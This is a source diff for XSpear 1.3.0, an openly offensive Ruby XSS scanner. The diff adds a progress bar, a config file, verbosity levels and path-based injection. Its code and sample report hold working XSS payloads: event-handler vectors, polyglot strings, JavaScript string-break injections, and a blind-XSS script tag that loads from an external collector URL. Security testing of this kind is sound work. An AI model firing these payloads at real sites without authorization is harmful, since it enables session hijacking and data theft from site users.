+        "method": "GET",
+        "param": "-",
+        "payload": "<original query>",
+        "description": "Not set HSTS"
+    }, {
+        "id": 3,
+        "type": "INFO",
+        "issue": "STATIC ANALYSIS",
+        "method": "GET",
+        "param": "-",
+        "payload": "<original query>",
+        "description": "Content-Type: text/html"
+    }, {
+        "id": 4,
+        "type": "LOW",
+        "issue": "STATIC ANALYSIS",
+        "method": "GET",
+        "param": "-",
+        "payload": "<original query>",
+        "description": "Not Set X-Frame-Options"
+    }, {
+        "id": 5,
+        "type": "MIDUM",
+        "issue": "STATIC ANALYSIS",
+        "method": "GET",
+        "param": "-",
+        "payload": "<original query>",
+        "description": "Not Set CSP"
+    }, {
+        "id": 6,
+        "type": "INFO",
+        "issue": "REFLECTED",
+        "method": "GET",
+        "param": "cat",
+        "payload": "rEfe6",
+        "description": "reflected parameter"
+    }, {
+        "id": 7,
+        "type": "INFO",
+        "issue": "FILERD RULE",
+        "method": "GET",
+        "param": "cat",
+        "payload": "onhwul=64",
+        "description": "not filtered event handler on{any} pattern"
+    }
+....
+, {
+        "id": 17,
+        "type": "HIGH",
+        "issue": "XSS",
+        "method": "GET",
+        "param": "cat",
+        "payload": "<audio src onloadstart=alert(45)>",
+        "description": "reflected HTML5 XSS Code"
+    }, {
+        "id": 18,
+        "type": "HIGH",
+        "issue": "XSS",
+        "method": "GET",
+        "param": "cat",
+        "payload": "<keygen autofocus onfocus=alert(45)>",
+        "description": "reflected onfocus XSS Code"
+ ....
+    }, {
+        "id": 24,
+        "type": "HIGH",
+        "issue": "XSS",
+        "method": "GET",
+        "param": "cat",
+        "payload": "<marquee onstart=alert(45)>",
+        "description": "triggered <marquee onstart=alert(45)>"
+    }]
+}
+```
+(Items marked as `triggered` are actually payloads that work in the browser.)
 etc...
 ### Sample log
@@ -143,32 +332,7 @@ __((_)(_))  /(/(   /((_))(_))(()\
 {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                  / \<
                                     \>       [ v1.1.5 ]
-[*] analysis request..
-[-] [23:50:35] [200/OK] 'zfdfasdf' not reflected rEfe6
-[-] [23:50:35] [200/OK] 'cat' not reflected <script>alert(45)</script>
-[I] [23:50:35] [200/OK] [param: cat][Found SQL Error Pattern]
-[-] [23:50:35] [200/OK] 'zfdfasdf' not reflected <script>alert(45)</script>
-[-] [23:50:35] [200/OK] 'STATIC' not reflected
-[I] [23:50:35] [200/OK] reflected rEfe6[param: cat][reflected parameter]
-[*] creating a test query [for reflected 2 param + blind xss ]
-[*] test query generation is complete. [192 query]
-[*] starting XSS Scanning. [10 threads]
-..snip..
-[I] [23:50:47] [200/OK] reflected xsp<frameset>
-[I] [23:50:47] [200/OK] reflected xsp<applet>
-[I] [23:50:48] [200/OK] reflected document.cookie.xspear
-[I] [23:50:48] [200/OK] reflected document.location.xspear
-[-] [23:50:48] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
-[H] [23:50:50] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
-[-] [23:50:55] [200/OK] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
-[V] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>[param: cat][triggered <script>alert(45)</script>]
-[H] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <marquee onstart=alert(45)>[param: cat][triggered <marquee onstart=alert(45)>]
-[H] [23:50:57] [200/OK] found alert/prompt/confirm (45) in selenium!! <details/open/ontoggle="alert(45)">[param: cat][triggered <details/open/ontoggle="alert(45)">]
-[H] [23:50:58] [200/OK] found alert/prompt/confirm (45) in selenium!! <audio src onloadstart=alert(45)>[param: cat][triggered <audio src onloadstart=alert(45)>]
-[-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
-[-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event <svg(0x0c)onload=alert(1)>
-[V] [23:51:00] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
-...snip..
+...snip...
 [*] finish scan. the report is being generated..
 +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
 |                                                            [ XSpear report ]                                                            |
@@ -343,3 +507,6 @@ Everyone interacting in the XSpear project’s codebases, issue trackers, chat r
 <img src="https://user-images.githubusercontent.com/13212227/63032409-b8996580-bef0-11e9-93cd-dbabbd5f4ea1.png" width=100%>
 < JSON Report >
 <img src="https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png" width=100%>
+## Video
+[![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)

data/XSpear.gemspec CHANGED Viewed

@@ -37,10 +37,12 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency "colorize", "~> 0.8.1"
   spec.add_runtime_dependency "selenium-webdriver", "~> 3.142.3"
   spec.add_runtime_dependency "terminal-table", "~> 1.8.0"
+  spec.add_runtime_dependency "progress_bar", "~> 2.3.2"
   spec.add_development_dependency "colorize", "~> 0.8.1"
   spec.add_development_dependency "selenium-webdriver", "~> 3.142.3"
   spec.add_development_dependency "terminal-table" , "~> 1.8.0"
+  spec.add_development_dependency "progress_bar", "~> 2.3.2"
   spec.add_development_dependency "bundler", "~> 2.0"
   spec.add_development_dependency "rake", "~> 10.0"
   spec.add_development_dependency "rspec", "~> 3.0"

data/config.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "blind":"",
+  "headers":"",
+  "cookie":"",
+  "thread":"",
+  "output":"",
+  "verbose":"",
+  "all":false
+}

data/exe/XSpear CHANGED Viewed

@@ -1,11 +1,11 @@
 #!/usr/bin/env ruby
+require "XSpear"
+XOptions = Struct.new(:url, :data, :headers, :params, :options)
-require "XSpear"
-Options = Struct.new(:url, :data, :headers, :params, :options )
 class Parser
   def self.parse(options)
-    args = Options.new('xspear')
+    args = XOptions.new('xspear')
     args.options = {}
     if options.empty?
       banner
@@ -13,7 +13,7 @@ class Parser
       exit
     end
     opt_parser = OptionParser.new do |opts|
-      opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'\n\n[ Options ]"
+      opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a \n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2\n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json\n\n[ Options ]"
       opts.on('-u', '--url=target_URL', '[required] Target Url') do |n|
@@ -48,7 +48,6 @@ class Parser
         args.options['params'] = n
       end
       opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
         args.options['blind'] = n
       end
@@ -59,15 +58,18 @@ class Parser
       end
-      opts.on('-o', '--output=FILENAME', '[optional] Save JSON Result') do |n|
+      opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
         args.options['output'] = n
       end
+      opts.on('-c', '--config=FILENAME', '[optional] Using config.json') do |n|
+        args.options['config'] = n
+      end
-      opts.on('-v', '--verbose=1~3', '[optional] Show log depth',
-              ' + Default value: 2',
-              ' + v=1 : quite mode',
-              ' + v=2 : show scanning log',
+      opts.on('-v', '--verbose=0~3', '[optional] Show log depth',
+              ' + v=0 : quite mode(only result)',
+              ' + v=1 : show scanning status(default)',
+              ' + v=2 : show scanning logs',
               ' + v=3 : show detail log(req/res)') do |n|
         args.options['verbose'] = n
       end
@@ -151,10 +153,21 @@ end
 exit unless options.url
 options.options['thread'] = 10 unless options.options['thread']
-options.options['verbose'] = 2 unless options.options['verbose']
+options.options['verbose'] = 1 unless options.options['verbose']
 options.options['thread'] = options.options['thread'].to_i
-if options.options['verbose'].to_i != 1
+if !options.options['config'].nil?
+  f = File.open(options.options['config'])
+  buf = f.read
+  cjson = JSON.parse buf
+  cjson.each do |key,value|
+    if value.to_s.size > 0
+      options.options[key] = value
+    end
+  end
+end
+if options.options['verbose'].to_i != 0
   banner
 end
 s = XspearScan.new options.url, options.options

data/lib/XSpear/log.rb CHANGED Viewed

@@ -10,7 +10,16 @@ def log(t, message)
   # system message
   # [+] start parameter analysis..
-  if @verbose.to_i > 1
+  # verbose 0 : only result
+  # verbose 1(default) : show progress
+  # verbose 2 : show normal log(info, payload)
+  # verbose 3 : show details log(info, payload, packets, etc..)
+  if @verbose.to_i == 1
+    if t == 's' # system message
+      puts '[*]'.green + " #{message}"
+    end
+  elsif @verbose.to_i > 1
     time = Time.now
     if t == 'd'
       puts '[-]'.white + " [#{time.strftime('%H:%M:%S')}] #{message}"

data/lib/XSpear/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.2.3"
+  VERSION = "1.3.0"
 end

data/lib/XSpear.rb CHANGED Viewed

@@ -7,6 +7,7 @@ require 'uri'
 require 'optparse'
 require 'colorize'
 require "selenium-webdriver"
+require "progress_bar"
 module XSpear
   class Error < StandardError; end
@@ -35,6 +36,7 @@ class XspearScan
     @filtered_objects = {}
     @reflected_params = []
     @param_check_switch = 0
+    @progress_bar = nil
   end
   class ScanCallbackFunc
@@ -172,7 +174,7 @@ class XspearScan
             d = c.split " "
             r = r+d[0]+" "
           end
-          @report.add_issue("i","s","-","-","<original query>","Set CSP(#{r})")
+          @report.add_issue("i","s","-","-","<original query>","Enabled CSP")
         rescue
           @report.add_issue("i","s","-","-","<original query>","CSP ERROR")
         end
@@ -180,7 +182,6 @@ class XspearScan
         @report.add_issue("m","s","-","-","<original query>","Not Set CSP")
       end
       [false, "not reflected #{@query}"]
     end
   end
@@ -500,9 +501,9 @@ class XspearScan
     # Check Event Handler
-    r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
+    r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "reflected EH "+"on{any} pattern".blue, CallbackStringMatch)
     event_handler.each do |ev|
-      r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
+      r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "reflected EH "+"#{ev}=64".blue, CallbackNotAdded)
     end
@@ -541,18 +542,21 @@ class XspearScan
       r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
     end
     # Check Selenium Common XSS Payloads
     r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
     r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
     r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
     r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'h', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
+    # + in Javascript payloads
+    r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
     # Check Selenium XSS Polyglot
     r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
@@ -560,8 +564,6 @@ class XspearScan
     r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
     # Check Blind XSS Payload
     if !@blind_url.nil?
       r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -575,8 +577,9 @@ class XspearScan
     r = r.flatten
     log('s', "test query generation is complete. [#{r.length} query]")
     log('s', "starting XSS Scanning. [#{@thread} threads]")
+    if @verbose.to_i == 1
+      @progress_bar = ProgressBar.new(r.length)
+    end
     threads = []
     r.each_slice(@thread) do |jobs|
       jobs.map do |node|
@@ -622,7 +625,6 @@ class XspearScan
     #       [x]ss
     #       [s]tatic
     #       [d]ynamic
     result = []
     if type == 's'
       if @data.nil?
@@ -664,10 +666,36 @@ class XspearScan
             end
           end
         end
+        if callback == CallbackXSSSelenium
+          begin
+            puri = URI.parse(@url)
+            puri.path = puri.path+URI.encode("/"+pattern)
+            result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
+            puri = URI.parse(@url)
+            puri.path = puri.path+URI.encode(pattern)
+            result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
+          rescue
+            # bypass
+            # if no slash end
+          end
+        end
       rescue StandardError
         # bypass
-        # puts @data
-        # puts e
+        # if no params
+        if callback == CallbackXSSSelenium
+          begin
+            puri = URI.parse(@url)
+            puri.path = puri.path+URI.encode("/"+pattern)
+            result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
+            puri = URI.parse(@url)
+            puri.path = puri.path+URI.encode(pattern)
+            result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
+          rescue
+            # bypass
+            # if no slash end
+          end
+        end
       end
       result
     end
@@ -675,7 +703,17 @@ class XspearScan
   def task(query, injected, pattern, callback)
     begin
-      uri = URI.parse(@url)
+      if (!@progress_bar.nil?) && @verbose.to_i == 1
+        print "\r\r"
+        print "\r\r"
+        @progress_bar.increment!
+      end
+      uri = nil
+      if pattern == "[PATH]"
+        uri = URI.parse(query)
+      else
+        uri = URI.parse(@url)
+      end
       request = nil
       method = "GET"
       uri.query = query if injected == 'url'
@@ -716,6 +754,6 @@ class XspearScan
       end
     end
   rescue => e
-    puts e
+    #puts e
   end
 end

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.2.3
+  version: 1.3.0
 platform: ruby
 authors:
 - hahwul
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2019-12-23 00:00:00.000000000 Z
+date: 2019-12-29 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -52,6 +52,20 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: 1.8.0
+- !ruby/object:Gem::Dependency
+  name: progress_bar
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.3.2
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.3.2
 - !ruby/object:Gem::Dependency
   name: colorize
   requirement: !ruby/object:Gem::Requirement
@@ -94,6 +108,20 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: 1.8.0
+- !ruby/object:Gem::Dependency
+  name: progress_bar
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.3.2
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.3.2
 - !ruby/object:Gem::Dependency
   name: bundler
   requirement: !ruby/object:Gem::Requirement
@@ -161,6 +189,7 @@ files:
 - XSpear.gemspec
 - bin/console
 - bin/setup
+- config.json
 - exe/XSpear
 - lib/XSpear.rb
 - lib/XSpear/XSpearRepoter.rb